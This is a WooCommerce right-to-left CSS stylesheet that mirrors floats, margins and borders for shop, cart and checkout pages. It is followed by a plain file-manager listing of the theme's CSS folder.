body.rtl.single-product div.product .images .thumbnails a.zoom.last,
body.rtl #reviews .comment-form-email {
	margin-left: 0
}
body.rtl.single-product div.product form.cart .quantity,
body.rtl .widget_price_filter .price_slider_amount .button,
body.rtl #payment .terms input,
body.rtl .quantity .qty,
body.rtl .quantity .minus,
body.rtl .quantity .plus {
	float: right;
}

body.rtl.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-2 .flex-control-thumbs li {
	float: right;
	margin-left: 14.2857142857%;
	margin-right: 0
}

body.rtl.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-3 .flex-control-thumbs li {
	float: right;
	margin-left: 14.2857142857%;
	margin-right: 0
}
body.rtl.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-4 .flex-control-thumbs li {
	float: right;
	margin-left: 14.2857142857%;
	margin-right: 0;
}

body.rtl.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-4 .flex-control-thumbs li:nth-child(4n),
body.rtl.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-2 .flex-control-thumbs li:nth-child(2n),
body.rtl.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-3 .flex-control-thumbs li:nth-child(3n) {
	margin-left: 0
}

body.rtl.single-product div.product .woocommerce-product-gallery .woocommerce-product-gallery__trigger {
	left: .875em;
	right: auto;
}

body.rtl.single-product div.product form.cart .button,
body.rtl.single-product div.product .woocommerce-product-rating .star-rating,
body.rtl #reviews .commentlist li .avatar,
body.rtl .widget.woocommerce li .count,
body.rtl #payment .payment_methods li img,
body.rtl #payment .payment_methods li .payment_box fieldset .form-row-first select:nth-child(2n),
body.rtl #payment .payment_methods li .payment_box fieldset .help {
	float: left;
}
body.rtl #reviews .commentlist,
body.rtl #payment .payment_methods li .payment_box fieldset label {
	margin-right: 0
}
body.rtl #reviews .commentlist li ul.children {
	float: left;
	margin-left: 0;
}
body.rtl .product_list_widget li img {
	margin-left: 10px;
	margin-right: 0;
	float: right
}
body.rtl .widget_shopping_cart .product_list_widget li {
	padding-left: 0;
	padding-right: 2em;
}
body.rtl .widget_shopping_cart .product_list_widget li a.remove {
	left: auto;
	right: 0;
}
body.rtl .widget_product_categories .children {
	margin-left: 0;
	margin-right: 1.618em
}
body.rtl .widget_layered_nav .chosen:before {
	margin-left: .53em;
	margin-right: 0;
}
body.rtl .widget_price_filter .ui-slider  {
	text-align: right;
}
body.rtl .widget_price_filter .ui-slider .ui-slider-handle:last-child {
	margin-left: 0
	margin-right: -1em
}
body.rtl .widget_price_filter .ui-slider-horizontal .ui-slider-range-min {
	left: auto;
	right: -1px
}
body.rtl .widget_price_filter .ui-slider-horizontal .ui-slider-range-max {
	right: auto;
	left: -1px
}
body.rtl ul.order_details li {
	border-left: 1px solid rgba(0, 0, 0, .1);
	border-right: 0
}
body.rtl ul.order_details li:last-child {
	border-left: 0
}
body.rtl .form-row-last {
	margin-left: 0!important
}
body.rtl .demo_store:before {
	margin-left: .53em;
	margin-right: 0;
}
body.rtl .star-rating:before,
body.rtl .star-rating span {
	float: right;
	left: auto;
	right: 0;
}
body.rtl .star-rating span:before {
	left: auto;
	right: 0;
}
body.rtl p.stars a {
	margin-right: 0;
	margin-left: 1em;
}
body.rtl p.stars a.star-1:after,
body.rtl p.stars a.star-2:after,
body.rtl p.stars a.star-3:after,
body.rtl p.stars a.star-4:after,
body.rtl p.stars a.star-5:after {
	left: auto;
	right: 0;
	padding-left: 1em;
	padding-right: 0
}
body.rtl .onsale {
	left: auto;
	right: 10px;
}
body.rtl ul.products .onsale {
	left: auto;
	right: 5px;
}
body.rtl .woocommerce-tabs ul.tabs li {
	margin-right: 0;
	margin-left: 1em;
}
body.rtl .woocommerce-tabs ul.tabs li.active:after {
	left: 0;
	right: 50%;
	margin-left: 0;
	margin-right: -.5em
}
body.rtl .shop_attributes {
	text-align: right;
}
body.rtl .shop_attributes th {
	padding-left: 15px;
	padding-right: 0;
}
body.rtl .woocommerce-error,
body.rtl .woocommerce-info,
body.rtl .woocommerce-message,
body.rtl .woocommerce-noreviews,
body.rtl p.no-comments {
	border-width: 0 5px 0 0;
	margin-right: 0;
}
body.rtl .woocommerce-error .button,
body.rtl .woocommerce-info .button,
body.rtl .woocommerce-message .button,
body.rtl .woocommerce-noreviews .button,
body.rtl p.no-comments .button {
	float: left;
	padding: 0 1em 0 0;
	border-width: 0 1px 0 0;
	border-right-style: solid;
	border-right-color: rgba(0, 0, 0, .25) !important;
}
body.rtl .added_to_cart {
	padding-right: 10px;
	padding-left: 0;
}
body.rtl .widget_product_search #s{
	margin-right: 0;
	margin-left: 2%;
}
body.rtl .woocommerce-pagination .page-numbers li .page-numbers.prev:before {
	content: "\f105";
}
body.rtl .woocommerce-pagination .page-numbers li .page-numbers.next:before {
	content: "\f104";
}

@media screen and (min-width: 768px) {
	body.rtl p.stars a.star-1,
	body.rtl p.stars a.star-2,
	body.rtl p.stars a.star-3,
	body.rtl p.stars a.star-4 {
		border-left: 1px solid rgba(0, 0, 0, .1);
		border-right: 0 none;
	}
	body.rtl ul.products li.product {
		clear: none;
		float: right;
		margin-left: 4.34783%;
		margin-right: 0
	}
	body.rtl ul.products li.product.last {
		margin-left: 0!important
	}
	body.rtl.single-product div.product .images {
		float: right;
		margin-left: 3.88235%;
		margin-right: 0;
	}
	body.rtl.single-product div.product .images .thumbnails a.zoom {
		float: right;
		margin-left: 3%;
		margin-right: 0
	}
	body.rtl.single-product div.product .images .thumbnails a.zoom.last {
		margin-left: 0
	}
	body.rtl.single-product div.product .summary {
		float: left;
		margin-left: 0;
	}
	body.rtl.woocommerce .page-description {
		float: right;
		margin-right: 0;
		margin-left: 5.88235%;
	}
	body.rtl .woocommerce-result-count {
		float: right;
	}
	body.rtl .woocommerce-ordering {
		float: left
	}
	body.rtl table.cart td.actions {
		text-align: left
	}
	body.rtl table.cart td.actions .coupon {
		float: right
	}
	body.rtl .cart-collaterals .cross-sells {
		float: right;
		margin-right: 0;
		margin-left: 5.88235%
	}
	body.rtl .cart-collaterals .cross-sells ul.products li.product {
		float: right;
		margin-right: 0;
		margin-left: 14.28571%
	}
	body.rtl .cart-collaterals .cart_totals,
	body.rtl .cart-collaterals .shipping_calculator {
		float: left;
		clear: left
	}
	body.rtl .cart-collaterals .shipping_calculator {
		clear: left
	}
	body.rtl #customer_details {
		float: right;
		margin-right: 0;
		margin-left: 5.88235%
	}
	body.rtl #customer_details .form-row-first {
		float: right;
		margin-right: 0;
		margin-left: 11.11111%
	}
	body.rtl #customer_details .form-row-last {
		float: left;
		margin-left: 0
	}
	body.rtl #order_review,
	body.rtl #order_review_heading {
		float: left;
		margin-left: 0;
	}
	body.rtl #wc_checkout_add_ons {
		float: right;
		margin-right: 0%;
		margin-left: 5.88235%
	}
	body.rtl .form-row-first {
		float: right;
		margin-right: 0;
		margin-left: 5.88235%;
	}
	body.rtl .form-row-last {
		float: left;
		margin-left: 0
	}
	body.rtl .woocommerce-tabs ul.tabs {
		float: right;
		margin-left: 5.88235%;
		margin-right: 0;
		padding-bottom: 0;
		text-align: right
	}
	body.rtl .woocommerce-tabs ul.tabs li.active:after {
		left: 0;
		right: auto;
		content: "\f104";
	}
	body.rtl .woocommerce-tabs .panel {
		float: left;
		margin-left: 0;
	}
}

Filemanager

Name Type Size Permission Actions
ilightbox Folder 0775
bbpress.css File 76.62 KB 0664
buddypress.css File 48.97 KB 0664
ie7.css File 610 B 0664
ie8.css File 659 B 0664
ie9.css File 98 B 0664
index.php File 28 B 0664
taqyeem.css File 7.39 KB 0664
woocommerce.css File 39.65 KB 0664